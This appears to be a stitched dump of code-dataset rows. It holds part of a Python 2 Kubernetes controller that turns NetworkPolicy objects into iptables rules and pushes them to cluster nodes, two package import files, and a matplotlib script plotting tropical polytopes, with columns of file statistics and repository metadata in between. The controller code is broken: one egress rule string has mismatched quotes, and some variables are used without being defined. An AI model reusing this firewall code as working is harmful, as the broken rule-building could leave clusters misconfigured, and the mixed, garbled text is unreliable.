policy = 'iptables -A KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:] + ' -s '+ingress_info['from_ip_block_cidr']+' -p ' +str(ingress_info['ingress_ports'][0]['protocol'].lower())+ ' -m '+str(ingress_info['ingress_ports'][0]['protocol'].lower())+ ' --dport ' + str(ingress_info['ingress_ports'][0]['port'])+ ' -m comment --comment \"network policy for POD '+ dest_pod_arr[policy_pod]['pod_name'] + ' from' + ingress_info['from_ip_block_cidr'] + '\" -j ACCEPT'
if 'except_ip_cidrs' in ingress_info:
policy_two = 'iptables -A KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:] + ' -s '+ingress_info['except_ip_cidrs'][0]+' -p ' +str(ingress_info['ingress_ports'][0]['protocol'].lower())+ ' -m '+str(ingress_info['ingress_ports'][0]['protocol'].lower())+ ' --dport ' + str(ingress_info['ingress_ports'][0]['port'])+ ' -m comment --comment \"network policy for POD '+ dest_pod_arr[policy_pod]['pod_name'] + ' from' + ingress_info['except_ip_cidrs'][0] + '\" -j DROP'
else:
policy = 'iptables -A KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:] + ' -s '+namespace_pod_arr[pod]['pod_ip']+' -m comment --comment \"network policy for POD '+ dest_pod_arr[policy_pod]['pod_name'] + ' from pod' + namespace_pod_arr[pod]['pod_name'] + '\" -j ACCEPT'
if 'except_ip_cidrs' in ingress_info:
policy_two = 'iptables -A KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:] + ' -s '+ingress_info['except_ip_cidrs'][0]+ '-m comment --comment \"network policy for POD '+ dest_pod_arr[policy_pod]['pod_name'] + ' from' + ingress_info['except_ip_cidrs'][0] + '\" -j DROP'
print policy
send_policy_to_node(dest_pod_arr[pod]['node_name'], policy)
time.sleep(1)
print policy_two
send_policy_to_node(dest_pod_arr[pod]['node_name'], policy_two)
time.sleep(1)
if dest_pod_arr[pod]['node_name'] in policy_list:
policy_list[dest_pod_arr[pod]['node_name']].append(policy_del)
policy_list[dest_pod_arr[pod]['node_name']].append(policy_del_two)
else:
policy_list[dest_pod_arr[pod]['node_name']] = []
policy_list[dest_pod_arr[pod]['node_name']].append(policy_del)
policy_list[dest_pod_arr[pod]['node_name']].append(policy_del_two)
return policy_list
def create_egress_iptable_rules(egress_info, policy_info):
policy_list = {}
#Implement for all possible scenarios like ingress - ipBlock, pod_selector_labels, namespace_labels etc.
#For now, just using ports and ipBlock
src_pod_arr = []
if policy_info['policy_type'] == 'network_policy':
if 'pod_selector_labels' in policy_info:
if 'namespace' in policy_info:
if policy_info['namespace'] != ' ':
src_pod_arr = get_ingress_nodes_of_pods_pod_selector(policy_info['namespace'], policy_info['pod_selector_labels'])
if 'to_ip_block_cidr' in egress_info:
if 'egress_ports' in egress_info:
for policy_pod in xrange(len(src_pod_arr)):
#Delete any existing rule
#assuming only one pair of port and protocol for now
if 'egress_ports' in egress_info:
policy_del = 'iptables -D KUBE-NWPLCY-'+ src_pod_arr[policy_pod]['pod_name'][-5:] + ' -d '+egress_info['to_ip_block_cidr']+' -p ' +str(egress_info['egress_ports'][0]['protocol'].lower())+ ' -m '+str(egress_info['egress_ports'][0]['protocol'].lower())+ ' --sport ' + str(egress_info['egress_ports'][0]['port']) + ' -m comment --comment \"network policy for POD '+ src_pod_arr[policy_pod]['pod_name'] + ' from' + egress_info['to_ip_block_cidr'] + '\" -j ACCEPT'
else:
policy_del = 'iptables -D KUBE-NWPLCY-'+ src_pod_arr[policy_pod]['pod_name'][-5:] + ' -d '+egress_info['to_ip_block_cidr']+' -m comment --comment \"network policy for POD '+ src_pod_arr[policy_pod]['pod_name'] + ' from ' + egress_info['to_ip_block_cidr'] + '\" -j ACCEPT'
policy_two_del = 'iptables -D KUBE-NWPLCY-'+ src_pod_arr[policy_pod]['pod_name'][-5:] + ' -j REJECT'
send_policy_to_node(src_pod_arr[policy_pod]['node_name'], policy_del)
time.sleep(1)
send_policy_to_node(src_pod_arr[policy_pod]['node_name'], policy_two_del)
time.sleep(1)
if 'egress_ports' in egress_info:
policy = 'iptables -A KUBE-NWPLCY-'+ src_pod_arr[policy_pod]['pod_name'][-5:] + '-d '+pod_arr[policy_pod]['pod_ip']+' ' -d '+egress_info['to_ip_block_cidr']+' -p ' + str(egress_info['egress_ports'][0]['protocol'].lower())+ ' -m '+str(egress_info['egress_ports'][0]['protocol'].lower())+ ' --sport ' + str(egress_info['egress_ports'][0]['port'])+ ' -m comment --comment \"network policy for POD '+ src_pod_arr[policy_pod]['pod_name'] + ' from' + egress_info['to_ip_block_cidr'] + '\" -j ACCEPT'
else:
policy = 'iptables -A KUBE-NWPLCY-'+ src_pod_arr[policy_pod]['pod_name'][-5:] + ' -d '+egress_info['to_ip_block_cidr']+ ' -m comment --comment \"network policy for POD '+ src_pod_arr[policy_pod]['pod_name'] + ' from ' + egress_info['to_ip_block_cidr'] + '\" -j ACCEPT'
policy_two = 'iptables -A KUBE-NWPLCY-'+ src_pod_arr[policy_pod]['pod_name'][-5:] + ' -j REJECT'
send_policy_to_node(src_pod_arr[policy_pod]['node_name'], policy)
time.sleep(1)
send_policy_to_node(src_pod_arr[policy_pod]['node_name'], policy_two)
time.sleep(1)
if src_pod_arr[policy_pod]['node_name'] in policy_list:
policy_list[src_pod_arr[policy_pod]['node_name']].append(policy_del)
policy_list[src_pod_arr[policy_pod]['node_name']].append(policy_two_del)
else:
policy_list[src_pod_arr[policy_pod]['node_name']] = []
policy_list[src_pod_arr[policy_pod]['node_name']].append(policy_del)
policy_list[src_pod_arr[policy_pod]['node_name']].append(policy_two_del)
return policy_list
def create_default_ingress_egress_deny_iptable_rules(policy_type, namespace):
if policy_type == 'default_deny_for_ingress_and_egress':
policy_list_ingress = {}
policy_list_ingress = create_default_deny_iptable_rules('default_deny_for_ingress', namespace)
policy_list_egress = {}
policy_list_egress = create_default_deny_iptable_rules('default_deny_for_egress', namespace)
for key in policy_list_ingress:
if key in policy_list_egress:
for rules in policy_list_egress[key]:
policy_list_ingress[key].append(rules)
else:
policy_list_ingress[key] = []
for rules in policy_list_egress[key]:
policy_list_ingress[key].append(rules)
for key in policy_list_egress:
if key not in policy_list_ingress:
policy_list_ingress[key] = []
for rules in policy_list_egress[key]:
policy_list_ingress[key].append(rules)
return policy_list_ingress
def create_default_deny_iptable_rules(policy_type, namespace):
pod_arr = []
policy_list = {}
if policy_type == 'default_deny_for_ingress':
if namespace != ' ':
pod_arr = get_pods_of_namespace(namespace)
for pod in xrange(len(pod_arr)):
#Delete any existing rule
policy_del = 'iptables -D OUTPUT -d '+pod_arr[pod]['pod_ip']+' -m comment --comment \"default ingress deny network policy for POD '+ pod_arr[pod]['pod_name'] + '\" -j DROP'
send_policy_to_node(pod_arr[pod]['node_name'], policy_del)
time.sleep(1)
#Add the new rule now
policy = 'iptables -I OUTPUT -d '+pod_arr[pod]['pod_ip']+' -m comment --comment \"default ingress deny network policy for POD '+ pod_arr[pod]['pod_name'] + '\" -j DROP'
send_policy_to_node(pod_arr[pod]['node_name'], policy)
time.sleep(1)
if pod_arr[pod]['node_name'] in policy_list:
policy_list[pod_arr[pod]['node_name']].append(policy_del)
else:
policy_list[pod_arr[pod]['node_name']] = []
policy_list[pod_arr[pod]['node_name']].append(policy_del)
elif policy_type == 'default_deny_for_egress':
if namespace != ' ':
pod_arr = get_pods_of_namespace(namespace)
for pod in xrange(len(pod_arr)):
#delete any exisiting rule
policy_del = 'iptables -D INPUT -s '+pod_arr[pod]['pod_ip']+' -m comment --comment \"default egress deny network policy for POD '+ pod_arr[pod]['pod_name'] + '\" -j DROP'
send_policy_to_node(pod_arr[pod]['node_name'], policy_del)
time.sleep(1)
#Add the new rule
policy = 'iptables -I INPUT -s '+pod_arr[pod]['pod_ip']+' -m comment --comment \"default egress deny network policy for POD '+ pod_arr[pod]['pod_name'] + '\" -j DROP'
send_policy_to_node(pod_arr[pod]['node_name'], policy)
time.sleep(1)
if pod_arr[pod]['node_name'] in policy_list:
policy_list[pod_arr[pod]['node_name']].append(policy_del)
else:
policy_list[pod_arr[pod]['node_name']] = []
policy_list[pod_arr[pod]['node_name']].append(policy_del)
return policy_list
def create_default_allow_iptable_rules(policy_type, namespace):
pod_arr = []
policy_list = {}
if policy_type == 'default_allow_for_ingress':
if namespace != ' ':
pod_arr = get_pods_of_namespace(namespace)
for pod in xrange(len(pod_arr)):
#Delete any existing rule
policy_del = 'iptables -D OUTPUT -d '+pod_arr[pod]['pod_ip']+' -m comment --comment \"default ingress allow network policy for POD '+ pod_arr[pod]['pod_name'] + '\" -j ACCEPT'
send_policy_to_node(pod_arr[pod]['node_name'], policy_del)
time.sleep(1)
#Add the new rule now
policy = 'iptables -I OUTPUT -d '+pod_arr[pod]['pod_ip']+' -m comment --comment \"default ingress allow network policy for POD '+ pod_arr[pod]['pod_name'] + '\" -j ACCEPT'
send_policy_to_node(pod_arr[pod]['node_name'], policy)
time.sleep(1)
if pod_arr[pod]['node_name'] in policy_list:
policy_list[pod_arr[pod]['node_name']].append(policy_del)
else:
policy_list[pod_arr[pod]['node_name']] = []
policy_list[pod_arr[pod]['node_name']].append(policy_del)
elif policy_type == 'default_allow_for_egress':
if namespace != ' ':
pod_arr = get_pods_of_namespace(namespace)
for pod in xrange(len(pod_arr)):
#delete any exisiting rule
policy_del = 'iptables -D INPUT -s '+pod_arr[pod]['pod_ip']+' -m comment --comment \"default egress allow network policy for POD '+ pod_arr[pod]['pod_name'] + '\" -j ACCEPT'
send_policy_to_node(pod_arr[pod]['node_name'], policy_del)
time.sleep(1)
#Add the new rule
policy = 'iptables -I INPUT -s '+pod_arr[pod]['pod_ip']+' -m comment --comment \"default egress allow network policy for POD '+ pod_arr[pod]['pod_name'] + '\" -j ACCEPT'
send_policy_to_node(pod_arr[pod]['node_name'], policy)
time.sleep(1)
if pod_arr[pod]['node_name'] in policy_list:
policy_list[pod_arr[pod]['node_name']].append(policy_del)
else:
policy_list[pod_arr[pod]['node_name']] = []
policy_list[pod_arr[pod]['node_name']].append(policy_del)
return policy_list
def get_ingress_egress_policy_info(network_policy, uid):
ingress_info = {}
egress_info = {}
ingress_egress_info = {}
for policyTypes in network_policy[uid]['spec']['policyTypes']:
if policyTypes == 'Ingress':
for items in network_policy[uid]['spec']['ingress']:
if 'ports' in items:
ingress_info['ingress_ports'] = items['ports']
for filters in items['from']:
if 'ipBlock' in filters:
ingress_info['from_ip_block_cidr'] = filters['ipBlock']['cidr']
if 'except' in filters['ipBlock']:
ingress_info['except_ip_cidrs'] = filters['ipBlock']['except']
elif 'namespaceSelector' in filters:
if 'matchLabels' in filters['namespaceSelector']:
ingress_info['namespace_labels'] = filters['namespaceSelector']['matchLabels']
elif 'podSelector' in filters:
if 'matchLabels' in filters['podSelector']:
ingress_info['pod_labels'] = filters['podSelector']['matchLabels']
elif policyTypes == 'Egress':
for items in network_policy[uid]['spec']['egress']:
if 'ports' in items:
egress_info['egress_ports'] = items['ports']
for filters in items['to']:
if 'ipBlock' in filters:
egress_info['to_ip_block_cidr'] = filters['ipBlock']['cidr']
if 'except' in filters['ipBlock']:
egress_info['except_ip_cidrs'] = filters['ipBlock']['except']
elif 'namespaceSelector' in filters:
if 'matchLabels' in filters['namespaceSelector']:
egress_info['namespace_labels'] = filters['namespaceSelector']['matchLabels']
elif 'podSelector' in filters:
egress_info['pod_labels'] = filters['podSelector']['matchLabels']
ingress_egress_info['ingress'] = ingress_info
ingress_egress_info['egress'] = egress_info
return ingress_egress_info
def get_pods_of_namespace(namespace):
pod_arr = []
pod_dict = {}
configuration = config.load_kube_config()
api_instance_pod = kubernetes.client.CoreV1Api(kubernetes.client.ApiClient(configuration))
include_uninitialized = True
limit = 56
pretty = 'true'
timeout_seconds = 30
watch = False
api_response = api_instance_pod.list_namespaced_pod(namespace, pretty=pretty, include_uninitialized=include_uninitialized, limit=limit, timeout_seconds=timeout_seconds)
for pod in xrange(len(api_response.items)):
pod_dict['pod_name'] = api_response.items[pod].metadata.name
pod_dict['node_name'] = api_response.items[pod].spec.node_name
pod_dict['pod_ip'] = api_response.items[pod].status.pod_ip
pod_arr.append(pod_dict)
pod_dict = {}
return pod_arr
def get_ingress_nodes_of_pods_pod_selector(namespace, pod_labels):
pod_dict = {}
pod_arr = []
configuration = config.load_kube_config()
api_instance_pod = kubernetes.client.CoreV1Api(kubernetes.client.ApiClient(configuration))
include_uninitialized = True
for key in pod_labels:
pod_labels_str = key+'='+pod_labels[key]
label_selector = pod_labels_str
limit = 56
pretty = 'true'
timeout_seconds = 30
watch = False
api_response = api_instance_pod.list_namespaced_pod(namespace, pretty=pretty, include_uninitialized=include_uninitialized, label_selector=label_selector, limit=limit, timeout_seconds=timeout_seconds)
for pod in xrange(len(api_response.items)):
pod_dict['pod_name'] = api_response.items[pod].metadata.name
pod_dict['node_name'] = api_response.items[pod].spec.node_name
pod_dict['pod_ip'] = api_response.items[pod].status.pod_ip
pod_arr.append(pod_dict)
pod_dict = {}
return pod_arr
def get_ingress_nodes_of_pods_namespace_selector(namespace_selector_labels):
pod_arr = []
pod_dict = {}
configuration = config.load_kube_config()
api_instance_pod = kubernetes.client.CoreV1Api(kubernetes.client.ApiClient(configuration))
include_uninitialized = True
for key in namespace_selector_labels:
namespace_labels = key+'='+namespace_selector_labels[key]
label_selector = namespace_labels
limit = 56
pretty = 'true'
timeout_seconds = 30
watch = False
api_response = api_instance_pod.list_pod_for_all_namespaces(pretty=pretty, include_uninitialized=include_uninitialized, label_selector=label_selector, limit=limit, timeout_seconds=timeout_seconds)
for pod in xrange(len(api_response.items)):
pod_dict['pod_name'] = api_response.items[pod].metadata.name
pod_dict['node_name'] = api_response.items[pod].spec.node_name
pod_dict['pod_ip'] = api_response.items[pod].status.pod_ip
pod_arr.append(pod_dict)
pod_dict = {}
return pod_arr
def create_updated_policy_rules(network_policy_updated, callback):
print 'Checking updated policy contents to add iptables based rules'
time.sleep(1)
callback(network_policy_updated)
@gen.engine
def watch_for_policies():
config.load_kube_config()
v1 = client.ExtensionsV1beta1Api()
network_policy = {}
network_policy_update = {}
w = watch.Watch()
for event in w.stream(v1.list_network_policy_for_all_namespaces):
print event
print("Event: %s %s %s" % (event['type'], event['object'].kind, event['object'].metadata.name))
if event['type'] == 'ADDED':
if event['object'].metadata.uid not in network_policy:
network_policy[event['object'].metadata.uid] = event['raw_object']
result = yield gen.Task(create_new_policy_rules, network_policy, event['object'].metadata.uid)
elif event['type'] == 'UPDATED':
network_policy_updated[event['object'].metadata.uid] = event['raw_object']
result = yield gen.Task(create_updated_policy_rules, network_policy_updated)
IOLoop.instance().stop()
if __name__ == "__main__":
watch_for_policies()
IOLoop.instance().start()
| 62.346021
| 513
| 0.612304
| 4,558
| 36,036
| 4.513383
| 0.050241
| 0.055123
| 0.036749
| 0.048853
| 0.863309
| 0.842553
| 0.816741
| 0.782374
| 0.762979
| 0.757729
| 0
| 0.007118
| 0.251526
| 36,036
| 577
| 514
| 62.454073
| 0.755598
| 0.046398
| 0
| 0.588621
| 0
| 0.010941
| 0.245835
| 0.017127
| 0.002188
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.015317
| null | null | 0.028446
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
393600f3c62483f796d71908699572205e88a00a
| 117
|
py
|
Python
|
QAStrategyCenter/Loader/__init__.py
|
yutiansut/QAStrategyTemplate
|
d5e8a8c55e815246f5131591481e1ff05ae21dea
|
[
"MIT"
] | null | null | null |
QAStrategyCenter/Loader/__init__.py
|
yutiansut/QAStrategyTemplate
|
d5e8a8c55e815246f5131591481e1ff05ae21dea
|
[
"MIT"
] | null | null | null |
QAStrategyCenter/Loader/__init__.py
|
yutiansut/QAStrategyTemplate
|
d5e8a8c55e815246f5131591481e1ff05ae21dea
|
[
"MIT"
] | null | null | null |
from QAStrategyCenter.Loader.render import QASPMSRender
from QAStrategyCenter.Loader.fileloader import load_from_file
| 58.5
| 61
| 0.905983
| 14
| 117
| 7.428571
| 0.642857
| 0.384615
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.059829
| 117
| 2
| 61
| 58.5
| 0.945455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1a445ca6f37cd4d17a568d56c7337c882a76710d
| 237
|
py
|
Python
|
deepdanbooru/model/__init__.py
|
fredgido/DeepDanbooru
|
044a92472bd153e227287be29c6f32ce7feb28a6
|
[
"MIT"
] | 4
|
2020-04-01T09:55:31.000Z
|
2022-01-07T08:40:52.000Z
|
deepdanbooru/model/__init__.py
|
Amaotomiyabi/DeepDanbooru
|
bf98806390ced6e78e8d4a05e006c1216bf48508
|
[
"MIT"
] | null | null | null |
deepdanbooru/model/__init__.py
|
Amaotomiyabi/DeepDanbooru
|
bf98806390ced6e78e8d4a05e006c1216bf48508
|
[
"MIT"
] | 1
|
2020-11-25T06:54:52.000Z
|
2020-11-25T06:54:52.000Z
|
import deepdanbooru.model.layers
import deepdanbooru.model.losses
from .resnet import create_resnet_152
from .resnet import create_resnet_custom_v1
from .resnet import create_resnet_custom_v2
from .resnet import create_resnet_custom_v3
| 29.625
| 43
| 0.877637
| 35
| 237
| 5.628571
| 0.371429
| 0.203046
| 0.324873
| 0.446701
| 0.659898
| 0.517767
| 0
| 0
| 0
| 0
| 0
| 0.027778
| 0.088608
| 237
| 7
| 44
| 33.857143
| 0.884259
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1a7019302b22815a48cb68855f848e13fe42b6fb
| 9,139
|
py
|
Python
|
create_figures.py
|
GeorgiosSmyrnis/multiclass_minimization_icml2020
|
3da0ea15ee94c74948631f22d527f52040294779
|
[
"MIT"
] | 2
|
2021-05-11T05:31:52.000Z
|
2022-03-18T22:24:45.000Z
|
create_figures.py
|
GeorgiosSmyrnis/multiclass_minimization_icml2020
|
3da0ea15ee94c74948631f22d527f52040294779
|
[
"MIT"
] | 1
|
2021-05-24T12:44:57.000Z
|
2021-05-24T12:44:57.000Z
|
create_figures.py
|
GeorgiosSmyrnis/multiclass_minimization_icml2020
|
3da0ea15ee94c74948631f22d527f52040294779
|
[
"MIT"
] | 1
|
2020-11-27T11:33:59.000Z
|
2020-11-27T11:33:59.000Z
|
#!/usr/bin/env python
import matplotlib.pyplot as plt
import numpy as np
from mpl_toolkits import mplot3d
from mpl_toolkits.mplot3d.art3d import Poly3DCollection
from scipy.spatial import ConvexHull
# Define parameters for Type 1 fonts
fsize = (3,3)
plt.rcParams['ps.useafm'] = True
plt.rcParams['pdf.use14corefonts'] = True
plt.rcParams['text.usetex'] = True
# Figure 1a, division of max(3x+1.5, 2x+1.3, x+0.75, 0) by max(x-0.5, 0).
plt.figure(figsize=fsize, dpi=300)
ax = plt.axes()
ax.plot([0,1,2,3],[0,0.75,1.3,1.5],'b.-',label = 'ENewt(p(x))')
ax.set_ylim(-1.25,2.25)
ax.set_xlabel('Tropical Degree')
ax.set_ylabel('Tropical Coefficient')
ax.plot([1,2],[0.25,-0.75], 'rx-', label = 'ENewt(d(x))')
ax.arrow(1,0.25,0,0.3,**{'width':0.01,'color':'g','linestyle':'-'})
ax.arrow(2,-0.75,0,0.3,**{'width':0.01,'color':'g','linestyle':'-'})
ax.grid(True, **{'alpha':0.5})
ax.legend()
plt.tight_layout()
# Figure 1b, result (quotient + divisor) is max(3x+0.3, 2x+1.3, x+0.75, 0)
plt.figure(figsize=fsize, dpi=300)
ax = plt.axes()
ax.set_xlabel('Tropical Degree')
ax.set_ylabel('Tropical Coefficient')
ax.plot([0,1,2,3],[0,0.75,1.3,0.3],'g.-', label='ENewt(q(x)+d(x))')
ax.set_ylim(-1.25,2.25)
ax.grid(True, **{'alpha':0.5})
ax.legend()
plt.tight_layout()
# Figure 2a, polytope of example network provided in paper, Section 4.1
fig = plt.figure(figsize=fsize, dpi=300)
ax = plt.axes(projection='3d')
ax.view_init(azim=-100)
ax.set_xlim([0,3.5])
ax.set_ylim([0,3.5])
ax.set_zlim([0,4.5])
ax.set_xlabel('Tropical Degree 1')
ax.set_ylabel('Tropical Degree 2')
ax.set_zlabel('Coefficient')
# Create the faces of the polytope
x = [0, 1, 1, 0]
y = [0, 0, 1, 1]
z = [0, 1, 2, 1]
poly = Poly3DCollection([list(zip(x,y,z))], zorder=1)
poly.set_edgecolor('black')
poly.set_facecolor('yellow')
ax.add_collection3d(poly)
x = [1, 1, 2, 2]
y = [0, 1, 2, 1]
z = [1, 2, 3, 2]
poly = Poly3DCollection([list(zip(x,y,z))], zorder=1)
poly.set_edgecolor('black')
poly.set_facecolor('yellow')
ax.add_collection3d(poly)
x = [0, 1, 2, 1]
y = [1, 1, 2, 2]
z = [1, 2, 3, 2]
poly = Poly3DCollection([list(zip(x,y,z))], zorder=1)
poly.set_edgecolor('black')
poly.set_facecolor('yellow')
ax.add_collection3d(poly)
ax.plot3D([2],[1],[2],'bo', zorder=2, label='Vertex 101')
ax.legend(loc='upper left')
# Figure 2b, the other network from the same example as before.
fig = plt.figure(figsize=fsize, dpi=300)
ax = plt.axes(projection='3d')
ax.view_init(azim=-100)
ax.set_xlim([0,3.5])
ax.set_ylim([0,3.5])
ax.set_zlim([0,4.5])
ax.set_xlabel('Tropical Degree 1')
ax.set_ylabel('Tropical Degree 2')
ax.set_zlabel('Coefficient')
x = [0, 2, 2, 0]
y = [0, 0, 1, 1]
z = [0, 2, 3, 1]
poly = Poly3DCollection([list(zip(x,y,z))])
poly.set_edgecolor('black')
poly.set_facecolor('red')
ax.add_collection3d(poly)
x = [2, 2, 3, 3]
y = [0, 1, 2, 1]
z = [2, 3, 4, 3]
poly = Poly3DCollection([list(zip(x,y,z))])
poly.set_edgecolor('black')
poly.set_facecolor('red')
ax.add_collection3d(poly)
x = [0, 2, 3, 1]
y = [1, 1, 2, 2]
z = [1, 3, 4, 2]
poly = Poly3DCollection([list(zip(x,y,z))])
poly.set_edgecolor('black')
poly.set_facecolor('red')
ax.add_collection3d(poly)
ax.plot3D([3],[1],[3],'bo', label='Vertex 101')
ax.legend(loc='upper left')
# Figure 3a, polytope of network with three neurons, example from Section 4.3
fig = plt.figure(figsize=fsize, dpi=300)
ax = plt.axes(projection='3d')
ax.view_init(azim=-100)
ax.set_xlim([0,2.5])
ax.set_ylim([0,2.5])
ax.set_zlim([0,3.5])
ax.set_xlabel('Tropical Degree 1')
ax.set_ylabel('Tropical Degree 2')
ax.set_zlabel('Coefficient')
x = [0, 1, 1, 0]
y = [0, 0, 1, 1]
z = [0, 1, 2, 1]
poly = Poly3DCollection([list(zip(x,y,z))])
poly.set_edgecolor('black')
poly.set_facecolor('yellow')
ax.add_collection3d(poly)
x = [1, 1, 2, 2]
y = [0, 1, 2, 1]
z = [1, 2, 3, 2]
poly = Poly3DCollection([list(zip(x,y,z))])
poly.set_edgecolor('black')
poly.set_facecolor('yellow')
ax.add_collection3d(poly)
x = [0, 1, 2, 1]
y = [1, 1, 2, 2]
z = [1, 2, 3, 2]
poly = Poly3DCollection([list(zip(x,y,z))])
poly.set_edgecolor('black')
poly.set_facecolor('yellow')
ax.add_collection3d(poly)
x = [0, 0, 2, 2]
y = [0, 1, 2, 1]
z = [0, 1, 3, 2]
ax.plot3D(x,y,z,'bo', label='Vertices Kept')
ax.legend()
# Figure 3b, approximation of the previous polytope with a network with fewer
# neurons.
fig = plt.figure(figsize=fsize, dpi=300)
ax = plt.axes(projection='3d')
ax.view_init(azim=-100)
ax.set_xlim([0,2.5])
ax.set_ylim([0,2.5])
ax.set_zlim([0,3.5])
ax.set_xlabel('Tropical Degree 1')
ax.set_ylabel('Tropical Degree 2')
ax.set_zlabel('Coefficient')
x = [0, 0, 2, 2]
y = [0, 1, 2, 1]
z = [0, 1, 3, 2]
poly = Poly3DCollection([list(zip(x,y,z))])
poly.set_edgecolor('black')
poly.set_facecolor('red')
ax.add_collection3d(poly)
ax.plot3D(x,y,z,'bo', label='Vertices Kept')
ax.legend()
# Figure 4a, original network polytope of example.
fig = plt.figure(figsize=fsize, dpi=300)
ax = plt.axes(projection='3d')
ax.view_init(azim=-100)
ax.set_xlim([0,5.5])
ax.set_ylim([0,5.5])
ax.set_zlim([0,3.5])
ax.set_xlabel('Tropical Degree 1')
ax.set_ylabel('Tropical Degree 2')
ax.set_zlabel('Coefficient')
ws = np.array([[1,2,1],[2,1,1],[2,0,0],[0,2,0]])
w_all = [np.zeros((1,3))]
for i1 in range(2):
for i2 in range(2):
for i3 in range(2):
for i4 in range(2):
if (i1+i2+i3+i4 > 0):
w_temp = []
if i1>0:
w_temp.append(ws[[0],:])
if i2>0:
w_temp.append(ws[[1],:])
if i3>0:
w_temp.append(ws[[2],:])
if i4>0:
w_temp.append(ws[[3],:])
w_all.append(sum(w_temp))
w_all.append(np.array([[2,2,5]]))
w_all = np.concatenate(w_all, axis=0)
hull = ConvexHull(w_all, qhull_options='QG16')
f = hull.simplices[hull.good]
for i in range(len(f)):
x = [w_all[f[i,2],0]]
y = [w_all[f[i,2],1]]
z = [w_all[f[i,2],2]]
for j in range(3):
w = w_all[f[i,j]]
x.append(w[0])
y.append(w[1])
z.append(w[2])
poly = Poly3DCollection([list(zip(x,y,z))])
poly.set_edgecolor('black')
poly.set_facecolor('blue')
ax.add_collection3d(poly)
# Figure 4b, polytope approximated via heuristic algorithm.
fig = plt.figure(figsize=fsize, dpi=300)
ax = plt.axes(projection='3d')
ax.view_init(azim=-100)
ax.set_xlim([-2.5,5.5])
ax.set_ylim([-2.5,5.5])
ax.set_zlim([0,3.5])
ax.set_xlabel('Tropical Degree 1')
ax.set_ylabel('Tropical Degree 2')
ax.set_zlabel('Coefficient')
ws = np.array([[5,5,2],[0,-2,0],[-2,0,0]])
w_all = [np.zeros((1,3))]
for i1 in range(2):
for i2 in range(2):
for i3 in range(2):
if (i1+i2+i3 > 0):
w_temp = []
if i1>0:
w_temp.append(ws[[0],:])
if i2>0:
w_temp.append(ws[[1],:])
if i3>0:
w_temp.append(ws[[2],:])
w_all.append(sum(w_temp))
w_all.append(np.array([[0,0,5]]))
w_all = np.concatenate(w_all, axis=0)
hull = ConvexHull(w_all, qhull_options='QG8')
f = hull.simplices[hull.good]
for i in range(len(f)):
x = [w_all[f[i,2],0]]
y = [w_all[f[i,2],1]]
z = [w_all[f[i,2],2]]
for j in range(3):
w = w_all[f[i,j]]
x.append(w[0])
y.append(w[1])
z.append(w[2])
poly = Poly3DCollection([list(zip(x,y,z))])
poly.set_edgecolor('black')
poly.set_facecolor('red')
ax.add_collection3d(poly)
# Figure 4c, polytope approximated with stable algorithm.
fig = plt.figure(figsize=fsize, dpi=300)
ax = plt.axes(projection='3d')
ax.view_init(azim=-100)
ax.set_xlim([0,5.5])
ax.set_ylim([0,5.5])
ax.set_zlim([0,3.5])
ax.set_xlabel('Tropical Degree 1')
ax.set_ylabel('Tropical Degree 2')
ax.set_zlabel('Coefficient')
ws = np.array([[0,2,0],[2,0,0],[3,3,2]])
w_all = [np.zeros((1,3))]
for i1 in range(2):
for i2 in range(2):
for i3 in range(2):
if (i1+i2+i3 > 0):
w_temp = []
if i1>0:
w_temp.append(ws[[0],:])
if i2>0:
w_temp.append(ws[[1],:])
if i3>0:
w_temp.append(ws[[2],:])
w_all.append(sum(w_temp))
w_all.append(np.array([[0,0,5]]))
w_all = np.concatenate(w_all, axis=0)
hull = ConvexHull(w_all, qhull_options='QG8')
f = hull.simplices[hull.good]
for i in range(len(f)):
x = [w_all[f[i,2],0]]
y = [w_all[f[i,2],1]]
z = [w_all[f[i,2],2]]
for j in range(3):
w = w_all[f[i,j]]
x.append(w[0])
y.append(w[1])
z.append(w[2])
poly = Poly3DCollection([list(zip(x,y,z))])
poly.set_edgecolor('black')
poly.set_facecolor('yellow')
ax.add_collection3d(poly)
# Output all of the above figures.
plt.show()
| 28.294118
| 78
| 0.580808
| 1,619
| 9,139
| 3.18777
| 0.11365
| 0.046503
| 0.024414
| 0.06801
| 0.832784
| 0.822903
| 0.815733
| 0.809339
| 0.806239
| 0.784538
| 0
| 0.079531
| 0.215779
| 9,139
| 322
| 79
| 28.381988
| 0.640575
| 0.079002
| 0
| 0.870849
| 0
| 0
| 0.092315
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.01845
| 0
| 0.01845
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
